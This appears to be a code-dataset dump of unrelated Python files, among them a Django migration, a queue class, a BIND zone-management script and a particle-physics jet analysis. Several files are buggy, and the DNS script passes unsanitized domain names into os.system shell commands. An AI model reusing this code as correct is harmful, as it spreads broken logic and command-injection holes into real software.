text
stringlengths 8
6.05M
|
|---|
# Generated by Django 2.1.9 on 2019-08-05 05:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('whiskydatabase', '0017_auto_20190621_1451'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='rating',
field=models.FloatField(default=0),
),
]
|
"""
Queue based upon array
用数组实现的队列
Author: Wenru
"""
from typing import Optional
class ArrayQueue:
def __init__(self, capacity: int):
self._items = []
self._capacity = capacity
self._head = 0
self._tail = 0
def enqueue(self, item: str) -> bool:
if self._tail == self._capacity:
if self._head == 0:
return False
else:
for i in range(0, self._tail - self._head):
self._data[i] = self._items[i + self._head]
self._tail = self._tail - self._head
self._head = 0
self._items.insert(self._tail, item)
self._tail += 1
return True
def dequeue(self) -> Optional[str]:
if self._head != self._tail:
item = self._items[self._head]
self._head += 1
return item
def __repr__(self) -> str:
return " ".join(item for item in self._items[self._head : self._tail])
|
def solution(s):
# 각 케이스별로 나눌 수 있게 문자열에 불필요한 문자 제거
a = s.replace('{{', '')
c = a.replace('}}', '')
d = c.replace(',', ' ')
e = d.split('} {')
# 중복 값이 없다는 조건은 set을 활용하라는 의미로 받아드림
# str 값이 담긴 e 리스트를 int형 set으로 변환 (- 연산을 위해서 set 변환)
SetList = [set(map(int, i.split())) for i in e]
SetList.sort() # 길이에 따라 정렬
answer = []
# 해당 집합보다 길이가 1 작은 집합의 차집합으로 나온 수가 순서가 됨
# {2} > 2로 시작
# {2, 1} > {2, 1} - {2} > {1} > 그 다음 1
# ...
answer += list(SetList[0])
for i in range(len(SetList) - 1):
answer += list(SetList[i + 1] - SetList[i])
return answer
|
# -*- coding: iso-8859-1 -*-
import eiscp
import logging
from kalliope.core.NeuronModule import NeuronModule, MissingParameterException
logging.basicConfig()
logger = logging.getLogger("kalliope")
class Onkyo(NeuronModule):
def __init__(self, **kwargs):
super(Onkyo, self).__init__(**kwargs)
# the args from the neuron configuration
self.ip_address = kwargs.get('ip_address', None)
self.volume = kwargs.get('volume', None)
self.command_1 = kwargs.get('command_1', None)
self.command_2 = kwargs.get('command_2', None)
self.command_3 = kwargs.get('command_3', None)
self.command_4 = kwargs.get('command_4', None)
self.command_5 = kwargs.get('command_5', None)
self.command_6 = kwargs.get('command_6', None)
# check if parameters have been provided
if self._is_parameters_ok():
receiver = eiscp.eISCP(self.ip_address)
if self.volume is not None:
try:
receiver.command("volume=%s" % int(self.volume))
receiver.disconnect()
except ValueError:
logger.debug("Attention: Onkyo volume needs to be integer")
if self.command_1 is not None:
receiver.command(self.command_1)
if self.command_2 is not None:
receiver.command(self.command_2)
if self.command_3 is not None:
receiver.command(self.command_3)
if self.command_4 is not None:
receiver.command(self.command_4)
if self.command_5 is not None:
receiver.command(self.command_5)
if self.command_6 is not None:
receiver.command(self.command_6)
receiver.disconnect()
def _is_parameters_ok(self):
"""
Check if received parameters are ok to perform operations in the neuron
:return: true if parameters are ok, raise an exception otherwise
.. raises:: MissingParameterException
"""
if self.ip_address is None:
raise MissingParameterException("You must set the IP address")
return True
|
from html.parser import HTMLParser
import requests
import sys
from colorama import init, Fore, Back, Style
class parse_html(HTMLParser):
def __init__(self):
self.final_brow = "---Dracux Browser--- "
self.print_data = False
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag=='title':
self.final_brow+='*'
self.print_data = True
elif tag=='p':
self.print_data = True
elif tag=='a':
self.final_brow+=Fore.RED+'<'
self.print_data = True
elif tag=='input':
for attr in attrs:
if attr[0]=='type':
if attr[1]=='text':
self.final_brow+=Back.WHITE+'__________________'+Back.BLACK+'\n'
#print(attrs)
def handle_endtag(self, tag):
if tag=='title':
self.final_brow+='*\n\n'
elif tag =='p':
self.final_brow+='\n'
elif tag == 'a':
self.final_brow+='>'+Fore.WHITE
def handle_data(self, data):
if self.print_data == True:
self.final_brow+=data
self.print_data = False
def get_url(self,url):
self.final_brow += Fore.BLUE+url+Fore.WHITE+" "
class browse:
def __init__(self,initial_url):
self.my_url=initial_url
self.r = '<Title>Welcome to my Browser</title>'
self.keep_going = True
def navigate(self):
if self.my_url.upper() == 'Q': #first commands
self.keep_going = False #TODO: this needs an url manager.
else: #Other things
if '.' not in self.my_url:
self.my_url = 'http://www.duckduckgo.com/?q='+self.my_url
elif self.my_url[0:4]!="http":
self.my_url = "http://www."+self.my_url
try:
self.r = requests.get(self.my_url)
except:
print("Site Does not exist")
def set_url(self):
self.my_url = input("Url: ")
def get_page(self):
parser = parse_html()
parser.get_url(self.my_url)
try:
parser.feed(self.r.text)
except:
parser.feed(self.r)
print(parser.final_brow)
self.set_url()
self.navigate()
if __name__ == '__main__':
colors= False
initial_url="http://www.dracux.com"
#managing arguments
if len(sys.argv)>1:
if sys.argv[1].upper()=='C': #C argument starts with color
print("COLOR")
colors=True
elif sys.argv[1]!=None:
initial_url=sys.argv[1]
#end of managing arguments
if colors==False:
use_colors = input("Use colors? Y/N: ")
if use_colors.upper()=="N":
colors = False
print("I will go all in a boring black & white")
else:
colors = True
init()
else:
init()
my_browser = browse(initial_url)
my_browser.navigate()
while my_browser.keep_going:
my_browser.get_page()
|
from .day02 import part1, part2
|
from matplotlib.animation import FuncAnimation
from scipy.ndimage import convolve
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import perl
import sys
def interpolation(noise, screen_size, res_size):
tr = np.sqrt(res_size).astype('int64')
data = noise[:res_size].reshape(tr, tr)
screen = np.random.rand(screen_size, screen_size)
res = convolve(screen, data)
return res
def load_openbci_file(filename, ch_names=None, skiprows=0, max_rows=0):
"""
Load data from OpenBCI file into mne RawArray for later use
:param filename: filename for reading in form of relative path from working directory
:param ch_names: dictionary having all or some channels like this:
{"fp1":1, "fp2":2, "c3":3, "c4":4, "o1":5, "o2":6, "p3":7, "p4":8}
Key specifies position on head using 10-20 standard and
Value referring to channel number on Cyton BCI board
:return: yes
"""
if ch_names is None:
ch_names = {"fp1":0, "fp2":1, "c3":2, "c4":3, "o1":4, "o2":5, "p3":6, "p4":7}
converter = {i: (float if i < 12 else lambda x: str(x).split(".")[1][:-1])
for i in range(0, 13)}
data = np.loadtxt(filename, comments="%", delimiter=",", converters=converter, usecols=tuple(range(1,3))).T
data = data[list(ch_names.values())[:2]]
return data[:2]
def load_art_data(path, pattern):
"""
Loading meditation data from path.
:param path: path
:return: numpy array with 2 coefficients
"""
# Specifying files directory, select all the files from there which is txt
datadir = Path(path).glob(pattern)
# Transferring generator into array of file paths
return [load_openbci_file(x) for x in datadir]
def main():
fig = plt.figure()
window_size = 724
datas = load_art_data('art_data', '*14*Meditation*')
datas = np.array(list(map(lambda x: x.mean(axis=0), datas)))
print(datas)
datas = datas[0]
size = 255
datas = np.array([datas[j * size:j * size + size] for j in range(len(datas) // size)])
ax = plt.axes(xlim=(0, window_size), ylim=(0, window_size))
a = np.random.random((window_size, window_size))
im = plt.imshow(a, interpolation='none')
pnf = perl.PerlinNoiseFactory(1, unbias=True)
# initialization function: plot the background of each frame
def init():
im.set_data(np.random.random((window_size, window_size)))
return [im]
# animation function. This is called sequentially
def animate(i):
kernel_size = 225
data = datas[i]
noise = np.array(list(map(lambda x: pnf(x), data)))
res = interpolation(noise, window_size, kernel_size)
im.set_array(res)
return [im]
anim = FuncAnimation(fig, animate, init_func=init,
frames=10000, interval=20, blit=True)
# anim.save('basic_animation.mp4', writer='ffmpeg')
plt.show()
if __name__ == '__main__':
main()
|
s1 = 'Spicy Jalape\u00f1o'
s2 = 'Spicy Jalapen\u0303o'
print s1.decode("utf-8")
print s1
print s2
print s1 == s2
print len(s1)
print len(s2)
import unicodedata
t1 = unicodedata.normalize('NFC', s1)
t2 = unicodedata.normalize('NFC', s2)
print t1 == t2
t3 = unicodedata.normalize('NFD', s1)
t4 = unicodedata.normalize('NFD', s2)
print t3 == t4
s = '\ufb01'
print s
print unicodedata.normalize('NFD', s)
print unicodedata.normalize('NFKD', s)
print unicodedata.normalize('NFKC', s)
t1 = unicodedata.normalize('NFD', s1)
print ''.join(c for c in t1 if not unicodedata.combining(c))
|
import math
import unittest
import katas.kyu_7.radians_to_degrees
class RadiansToDegreesTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(math.degrees(math.pi), '180deg')
def test_equals_2(self):
self.assertEqual(math.radians(180), '3.14rad')
|
import random
random.seed()
class Tournament(object):
""" The crossover function requires two parents to be selected from the population pool. The Tournament class is used to do this.
Two individuals are selected from the population pool and a random number in [0, 1] is chosen. If this number is less than the 'selection rate' (e.g. 0.85), then the fitter individual is selected; otherwise, the weaker one is selected.
"""
def __init__(self):
return
def compete(self, candidates):
""" Pick 2 random candidates from the population and get them to compete against each other. """
c1 = candidates[random.randint(0, len(candidates) - 1)]
c2 = candidates[random.randint(0, len(candidates) - 1)]
f1 = c1.fitness
f2 = c2.fitness
# Find the fittest and the weakest.
if (f1 > f2):
fittest = c1
weakest = c2
else:
fittest = c2
weakest = c1
# selection_rate = 0.85
selection_rate = 0.80
r = random.uniform(0, 1.1)
while (r > 1): # Outside [0, 1] boundary. Choose another.
r = random.uniform(0, 1.1)
if (r < selection_rate):
return fittest
else:
return weakest
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os, sys, time
from datetime import date
from optparse import OptionParser, Option
# Complete hack.
Option.ALWAYS_TYPED_ACTIONS += ('callback',)
CONFIG = '/etc/bind/named.conf.slave'
#CONFIG = './named.conf.slave'
NOW = date.today()
DOMAINS_FOLDER = '/etc/bind/slave/'
MASTER_NS = '194.105.194.141'
def hlp():
print('''Usage: [function] [parameters]
[function]
-add domain - to add domain in bind9
-mass filename - to add domains from filename
Examples:
add-domain-name.py -add pixelon.ru
add-domain-name.py -mass filename
''')
def exist(domain):
if os.path.isfile(DOMAINS_FOLDER + domain): return True
else: return False
def add(option, opt_str, domain, parser):
for line in open(CONFIG):
if domain in line:
print('Domain ' + domain + ' already in config')
return False
if exist(domain):
print('Domain ' + domain + ' already added')
return False
add_block = '''
zone "''' + domain + '''" IN {
type slave;
file "''' + DOMAINS_FOLDER + domain + '''";
masters { ''' + MASTER_NS + '''; };
};'''
s = str(add_block)
f = open(CONFIG, 'a')
f.write(s)
print('Domain ' + domain + ' added')
def domdelete(option, opt_str, domain, parser):
os.system('cp '+CONFIG+' '+CONFIG+'.'+str(NOW))
domfile = open(CONFIG+'.'+str(NOW), "r")
start = -1
f = open(CONFIG, 'w')
for line in domfile:
if (line.replace('\n','',) == 'zone "' + domain + '" IN {'):
start = 0
if start>=0:
start = start + 1
else:
f.write(line)
if start > 5:
start = -1
if not exist(domain):
print('Domain file ' + domain + ' not found')
else:
os.system("unlink "+DOMAINS_FOLDER + domain)
print('Domain ' + domain + ' deleted')
if start>=0:
if not exist(domain):
print('Domain file ' + domain + ' not found')
else:
os.system("unlink "+DOMAINS_FOLDER + domain)
print('Domain ' + domain + ' deleted')
domfile.close()
f.close()
def add_mass(option, opt_str, filename, parser):
for domain in open(filename):
add('','',domain.replace('\n','',),'')
def delete_mass(option, opt_str, filename, parser):
for domain in open(filename):
domdelete('','',domain.replace('\n','',),'')
def main():
return 0
# domain = string(options.domain) if options.domain else None
# print(options)
# keys = sorted(options.keys())
# for opk in options:
# if(options[opk]):
# print opk + ' = '
#else:
# hlp()
#os.system('rndc reload')
global options
global args
p = OptionParser(usage="Usage: %prog [options] [file|domain]", version="%prog 0.2")
p.add_option('-a','--add',action='callback',dest='domain', type='string', callback=add,
help='Domain to add')
p.add_option('-m','--mass',action='callback',dest='filename', type='string', callback=add_mass,
help='File to mass add domains')
p.add_option('-d','--delete',action='callback', dest='domain', type='string', callback=domdelete,
help='Domain to delete')
p.add_option('-n','--massdel',action='callback', dest='filename', type='string', callback=delete_mass,
help='File to mass delete')
(options, args) = p.parse_args()
os.system('rndc reload')
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
"""
Analysis class to read a ROOT TTree of MC track information
and do jet-finding, and save response histograms.
Author: James Mulligan (james.mulligan@berkeley.edu)
"""
from __future__ import print_function
# General
import os
import sys
import argparse
import time
# Data analysis and plotting
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
import seaborn as sns
from array import *
import ROOT
import yaml
# Fastjet via python (from heppy)
import fastjet as fj
import fjcontrib
import fjtools
# Analysis utilities
from pyjetty.alice_analysis.process.base import process_io
from pyjetty.alice_analysis.process.base import process_io_emb
from pyjetty.alice_analysis.process.base import jet_info
from pyjetty.alice_analysis.process.base import process_base
from pyjetty.alice_analysis.process.base import thermal_generator
from pyjetty.mputils import CEventSubtractor
from pyjetty.mputils import RTreeWriter
# Prevent ROOT from stealing focus when plotting
ROOT.gROOT.SetBatch(True)
################################################################
class ProcessGroomers(process_base.ProcessBase):
#---------------------------------------------------------------
# Constructor
#---------------------------------------------------------------
def __init__(self, input_file='', config_file='', output_dir='', debug_level=0, **kwargs):
super(ProcessGroomers, self).__init__(input_file, config_file, output_dir, debug_level, **kwargs)
# Initialize configuration
self.initialize_config()
#---------------------------------------------------------------
# Main processing function
#---------------------------------------------------------------
def process_groomers(self):
self.start_time = time.time()
# ------------------------------------------------------------------------
# Use IO helper class to convert truth-level ROOT TTree into
# a SeriesGroupBy object of fastjet particles per event
tree_dir = 'PWGHF_TreeCreator'
io_truth = process_io.ProcessIO(input_file=self.input_file, tree_dir=tree_dir,
track_tree_name='tree_Particle_gen', use_ev_id_ext=self.use_ev_id_ext)
self.df_fjparticles = io_truth.load_data()
self.nEvents = len(self.df_fjparticles.index)
self.nTracks = len(io_truth.track_df.index)
print('--- {} seconds ---'.format(time.time() - self.start_time))
# ------------------------------------------------------------------------
# Set up the Pb-Pb embedding object
if not self.thermal_model:
self.process_io_emb = process_io_emb.ProcessIO_Emb(self.emb_file_list,
track_tree_name='tree_Particle_gen', is_pp = True,
use_ev_id_ext = self.use_ev_id_ext, remove_used_file=False)
# ------------------------------------------------------------------------
# Initialize histograms
self.initialize_output_objects()
# Create constituent subtractor, if configured
if self.do_constituent_subtraction:
self.constituent_subtractor = [CEventSubtractor(max_distance=R_max, alpha=self.alpha, max_eta=self.eta_max, bge_rho_grid_size=self.bge_rho_grid_size, max_pt_correct=self.max_pt_correct, ghost_area=self.ghost_area, distance_type=fjcontrib.ConstituentSubtractor.deltaR) for R_max in self.max_distance]
print(self)
# Find jets and fill histograms
print('Find jets...')
self.analyzeEvents()
# Plot histograms
print('Save histograms...')
process_base.ProcessBase.save_output_objects(self)
print('--- {} seconds ---'.format(time.time() - self.start_time))
#---------------------------------------------------------------
# Initialize config file into class members
#---------------------------------------------------------------
def initialize_config(self):
# Call base class initialization
process_base.ProcessBase.initialize_config(self)
# Read config file
with open(self.config_file, 'r') as stream:
config = yaml.safe_load(stream)
self.jet_matching_distance = config['jet_matching_distance']
self.mc_fraction_threshold = config['mc_fraction_threshold']
self.prong_matching_threshold = config['prong_matching_threshold']
self.use_ev_id_ext = config['use_ev_id_ext']
self.main_R_max = config['constituent_subtractor']['main_R_max']
self.eta_max = config['eta_max']
self.plot_diagram = config['plot_diagram']
if 'thermal_model' in config:
self.min_background_multiplicity = None
self.thermal_model = True
beta = config['thermal_model']['beta']
N_avg = config['thermal_model']['N_avg']
sigma_N = config['thermal_model']['sigma_N']
self.thermal_generator = thermal_generator.ThermalGenerator(N_avg = N_avg, sigma_N = sigma_N,
beta = beta, eta_max=self.eta_max)
else:
self.thermal_model = False
self.min_background_multiplicity = config['angantyr']['min_background_multiplicity']
self.emb_file_list = config['angantyr']['emb_file_list']
self.observable_list = config['process_observables']
# Create dictionaries to store grooming settings and observable settings for each observable
# Each dictionary entry stores a list of subconfiguration parameters
# The observable list stores the observable setting, e.g. subjetR
# The grooming list stores a list of SD or DG settings {'sd': [zcut, beta]} or {'dg': [a]}
self.obs_settings = {}
self.obs_grooming_settings = {}
for observable in self.observable_list:
# Fill observable settings
self.obs_settings[observable] = []
obs_config_dict = config[observable]
obs_config_list = [name for name in list(obs_config_dict.keys()) if 'config' in name ]
obs_subconfig_list = [name for name in list(obs_config_dict.keys()) if 'config' in name ]
self.obs_settings[observable] = self.utils.obs_settings(observable, obs_config_dict, obs_subconfig_list)
if observable == 'subjet_z':
self.subjet_def = {}
for subjetR in self.obs_settings[observable]:
self.subjet_def[subjetR] = fj.JetDefinition(fj.antikt_algorithm, subjetR)
# Fill grooming settings
self.obs_grooming_settings[observable] = self.utils.grooming_settings(obs_config_dict)
# Construct set of unique grooming settings
self.grooming_settings = []
lists_grooming = [self.obs_grooming_settings[obs] for obs in self.observable_list]
for observable in lists_grooming:
for setting in observable:
if setting not in self.grooming_settings and setting != None:
self.grooming_settings.append(setting)
# Set reclustering algorithm
self.recluster_alg = config['reclustering_algorithm']
if self.recluster_alg == 'CA':
self.reclustering_algorithm = fj.cambridge_algorithm
elif self.recluster_alg == 'KT':
self.reclustering_algorithm = fj.kt_algorithm
elif self.recluster_alg == 'AKT':
self.reclustering_algorithm = fj.antikt_algorithm
#---------------------------------------------------------------
# Initialize histograms
#---------------------------------------------------------------
def initialize_output_objects(self):
self.hNevents = ROOT.TH1F('hNevents', 'hNevents', 2, -0.5, 1.5)
if self.event_number_max < self.nEvents:
self.hNevents.Fill(1, self.event_number_max)
else:
self.hNevents.Fill(1, self.nEvents)
self.hRho = ROOT.TH1F('hRho', 'hRho', 1000, 0., 1000.)
self.hMult = ROOT.TH1F('hMult', 'hMult', 100, 0., 20000.)
#---------------------------------------------------------------
# Initialize histograms
#---------------------------------------------------------------
def initialize_output_objects_R(self, jetR):
for R_max in self.max_distance:
name = 'hDeltaPt_emb_R{}_Rmax{}'.format(jetR, R_max)
h = ROOT.TH2F(name, name, 300, 0, 300, 400, -200., 200.)
setattr(self, name, h)
name = 'hDeltaR_R{}_Rmax{}'.format(jetR, R_max)
h = ROOT.TH2F(name, name, 300, 0, 300, 100, 0., 2.)
setattr(self, name, h)
if 'subjet_z' in self.observable_list:
for subjetR in self.obs_settings['subjet_z']:
name = 'hDeltaR_{}_R{}_{}_Rmax{}'.format('subjet_z', jetR, subjetR, R_max)
h = ROOT.TH2F(name, name, 300, 0, 300, 100, 0., 2.)
setattr(self, name, h)
# Construct THn for each groomer: (pt, zg, theta_g, tag flag)
for grooming_setting in self.obs_grooming_settings['theta_g']:
if grooming_setting:
grooming_label = self.utils.grooming_label(grooming_setting)
for R_max in self.max_distance:
# THn for combined jets
dim = 4;
title = ['p_{T,ch jet}', '#it{z}_{g,ch}', '#theta_{g,ch}', 'flag']
nbins = [30, 50, 100, 9]
min = [0., 0., 0., 0.5]
max = [300., 0.5, 1., 9.5]
name = 'h_theta_g_zg_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
self.create_thn(name, title, dim, nbins, min, max)
# TH3 for truth jets
name = 'h_theta_g_zg_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
h = ROOT.TH3F(name, name, 30, 0, 300, 50, 0, 0.5, 100, 0, 1.0)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle('#it{z}_{g,ch}')
h.GetZaxis().SetTitle('#theta_{g,ch}')
setattr(self, name, h)
for observable in self.observable_list:
if observable in ['kappa', 'tf']:
if observable == 'kappa':
label = '#kappa_{ch}'
if observable == 'kappa':
label = '#it{t}_{f}'
for grooming_setting in self.obs_grooming_settings[observable]:
if grooming_setting:
grooming_label = self.utils.grooming_label(grooming_setting)
# TH3 for combined jets
for R_max in self.max_distance:
name = 'h_{}_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 50, 0, 0.5, 9, 0.5, 9.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('flag')
setattr(self, name, h)
# TH2 for truth jets
name = 'h_{}_JetPt_Truth_R{}_{}'.format(observable, jetR, grooming_label)
h = ROOT.TH2F(name, name, 30, 0, 300, 50, 0, 0.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
setattr(self, name, h)
if observable == 'subjet_z':
for obs_setting in self.obs_settings[observable]:
for R_max in self.max_distance:
label = '#it{z}'
name = 'h_{}_fraction_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('Prong matching fraction')
setattr(self, name, h)
name = 'h_{}_flag_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 9, 0.5, 9.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('flag')
setattr(self, name, h)
label = '#it{z}_{leading}'
name = 'h_{}_fraction_leading_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('Prong matching fraction')
setattr(self, name, h)
name = 'h_{}_flag_leading_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 9, 0.5, 9.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('flag')
setattr(self, name, h)
# Create prong matching histograms
for grooming_setting in self.obs_grooming_settings['theta_g']:
if grooming_setting:
grooming_label = self.utils.grooming_label(grooming_setting)
self.create_prong_matching_histograms(jetR, grooming_label)
# Create tree to store splitting info for all groomers
self.fill_tree = False
if self.fill_tree:
self.t = ROOT.TTree('t', 't')
self.tw = RTreeWriter(tree=self.t)
#---------------------------------------------------------------
# Create theta_g response histograms
#---------------------------------------------------------------
def create_prong_matching_histograms(self, jetR, grooming_label):
prong_list = ['leading', 'subleading']
match_list = ['leading', 'subleading', 'ungroomed', 'outside']
for R_max in self.max_distance:
for prong in prong_list:
for match in match_list:
name = 'hProngMatching_{}_{}_JetPt_R{}_{}_Rmax{}'.format(prong, match, jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 15, -0.4, 1.1, 100, 0., 1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction')
h.GetZaxis().SetTitle('#Delta R_{prong}/R_{g}')
setattr(self, name, h)
name = 'hProngMatching_{}_{}_JetPtZ_R{}_{}_Rmax{}'.format(prong, match, jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 15, -0.4, 1.1, 200, -0.5, 0.5)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction')
h.GetZaxis().SetTitle('#Delta z_{prong}/z')
setattr(self, name, h)
name = 'hProngMatching_subleading-leading_correlation_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 15, -0.4, 1.1, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction, leading_subleading')
h.GetZaxis().SetTitle('Prong matching fraction, subleading_leading')
setattr(self, name, h)
name = 'hProngMatching_truth_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
h = ROOT.TH2F(name, name, 30, 0, 300, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction, truth_groomed')
setattr(self, name, h)
name = 'hProngMatching_truth2_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
h = ROOT.TH2F(name, name, 30, 0, 300, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction, truth2_groomed')
setattr(self, name, h)
#---------------------------------------------------------------
# Main function to loop through and analyze events
#---------------------------------------------------------------
def analyzeEvents(self):
fj.ClusterSequence.print_banner()
print()
self.event_number = 0
for jetR in self.jetR_list:
self.initialize_output_objects_R(jetR)
# Then can use list comprehension to iterate over the groupby and do jet-finding
# simultaneously for fj_1 and fj_2 per event, so that I can match jets -- and fill histograms
result = [self.analyze_event(fj_particles) for fj_particles in self.df_fjparticles]
print('Save thn...')
process_base.ProcessBase.save_thn_th3_objects(self)
#---------------------------------------------------------------
# Analyze jets of a given event.
# fj_particles is the list of fastjet pseudojets for a single fixed event.
#---------------------------------------------------------------
def analyze_event(self, fj_particles_truth):
self.event_number += 1
if self.event_number > self.event_number_max:
return
if self.debug_level > 1:
print('-------------------------------------------------')
print('event {}'.format(self.event_number))
# Check that the entries exist appropriately
# (need to check how this can happen -- but it is only a tiny fraction of events)
if type(fj_particles_truth) != fj.vectorPJ:
print('fj_particles type mismatch -- skipping event')
return
if len(fj_particles_truth) > 1:
if np.abs(fj_particles_truth[0].pt() - fj_particles_truth[1].pt()) < 1e-5:
print('WARNING: Duplicate particles may be present')
print([p.user_index() for p in fj_particles_truth])
print([p.pt() for p in fj_particles_truth])
# Clear event in tree
if self.fill_tree:
self.tw.clear()
# If Pb-Pb, construct embedded event (do this once, for all jetR)
# If thermal model, generate a thermal event
if self.thermal_model:
fj_particles_combined_beforeCS = self.thermal_generator.load_event()
# Angantyr: Get Pb-Pb event
else:
accept_background_event = False
while not accept_background_event:
fj_particles_combined_beforeCS = self.process_io_emb.load_event()
particles = [p.eta() for p in fj_particles_combined_beforeCS]
multiplicity = sum(np.abs(i) < 0.9 for i in particles)
if multiplicity > self.min_background_multiplicity:
accept_background_event = True
self.hMult.Fill(multiplicity)
if self.debug_level > 3:
print('multiplicity: {}'.format(multiplicity))
print('accepted: {}'.format(accept_background_event))
# Form the combined event
# The pp-truth tracks are each stored with a unique user_index >= 0
# (same index in fj_particles_combined and fj_particles_truth -- which will be used in prong-matching)
# The Pb-Pb tracks are each stored with a unique user_index < 0
[fj_particles_combined_beforeCS.push_back(p) for p in fj_particles_truth]
# Perform constituent subtraction for each R_max
fj_particles_combined = [self.constituent_subtractor[i].process_event(fj_particles_combined_beforeCS) for i, R_max in enumerate(self.max_distance)]
if self.debug_level > 3:
print([p.user_index() for p in fj_particles_truth])
print([p.pt() for p in fj_particles_truth])
print([p.user_index() for p in fj_particles_combined[0]])
print([p.pt() for p in fj_particles_combined[0]])
print([p.user_index() for p in fj_particles_combined_beforeCS])
print([p.pt() for p in fj_particles_combined_beforeCS])
# Loop through jetR, and process event for each R
for jetR in self.jetR_list:
# Keep track of whether to fill R-independent histograms
self.fill_R_indep_hists = (jetR == self.jetR_list[0])
# Set jet definition and a jet selector
jet_def = fj.JetDefinition(fj.antikt_algorithm, jetR)
jet_selector_det = fj.SelectorPtMin(5.0) & fj.SelectorAbsRapMax(self.eta_max - jetR)
jet_selector_truth_matched = fj.SelectorPtMin(5.0) & fj.SelectorAbsRapMax(self.eta_max)
if self.debug_level > 2:
print('')
print('jet definition is:', jet_def)
print('jet selector for det-level is:', jet_selector_det)
print('jet selector for truth-level matches is:', jet_selector_truth_matched)
# Analyze
for i, R_max in enumerate(self.max_distance):
if self.debug_level > 1:
print('')
print('R_max: {}'.format(R_max))
print('Total number of combined particles: {}'.format(len([p.pt() for p in fj_particles_combined_beforeCS])))
print('After constituent subtraction {}: {}'.format(i, len([p.pt() for p in fj_particles_combined[i]])))
# Keep track of whether to fill R_max-independent histograms
self.fill_Rmax_indep_hists = (i == 0)
# Perform constituent subtraction on det-level, if applicable
rho = self.constituent_subtractor[i].bge_rho.rho()
if self.fill_R_indep_hists and self.fill_Rmax_indep_hists:
getattr(self, 'hRho').Fill(rho)
# Do jet finding (re-do each time, to make sure matching info gets reset)
cs_truth = fj.ClusterSequence(fj_particles_truth, jet_def)
jets_truth = fj.sorted_by_pt(cs_truth.inclusive_jets())
jets_truth_selected = jet_selector_det(jets_truth)
jets_truth_selected_matched = jet_selector_truth_matched(jets_truth)
cs_combined = fj.ClusterSequence(fj_particles_combined[i], jet_def)
jets_combined = fj.sorted_by_pt(cs_combined.inclusive_jets())
jets_combined_selected = jet_selector_det(jets_combined)
self.analyze_jets(jets_combined_selected, jets_truth_selected, jets_truth_selected_matched,
jetR, R_max = R_max)
if self.fill_tree:
self.tw.fill_tree()
#---------------------------------------------------------------
# Analyze jets of a given event.
#---------------------------------------------------------------
def analyze_jets(self, jets_combined_selected, jets_truth_selected,
jets_truth_selected_matched, jetR, R_max = None):
if self.debug_level > 1:
print('Number of det-level jets: {}'.format(len(jets_combined_selected)))
# Loop through jets and set jet matching candidates (based on deltaR) for each jet in user_info
[[self.set_matching_candidates(jet_combined, jet_truth, jetR,
'hDeltaR_R{{}}_Rmax{}'.format(R_max)) for jet_truth in jets_truth_selected]
for jet_combined in jets_combined_selected]
# Loop through jets and set accepted matches
hname = 'hJetMatchingQA_R{}_Rmax{}'.format(jetR, R_max)
[self.set_matches_AA_truth(jet_combined, jetR, hname) for jet_combined in jets_combined_selected]
# Loop through jets and fill delta-pt histograms
result = [self.fill_matching_histograms(jet_combined, jetR, R_max) for jet_combined in jets_combined_selected]
# Loop through jets and fill groomed histograms if both det and truth jets are unique match
for grooming_setting in self.grooming_settings:
if self.debug_level > 1:
print('grooming setting: {}'.format(grooming_setting))
result = [self.fill_groomed_jet_matches(grooming_setting, jet_combined, i_jet, jetR, R_max) for i_jet, jet_combined in enumerate(jets_combined_selected)]
#---------------------------------------------------------------
# Loop through jets and fill matching histos
#---------------------------------------------------------------
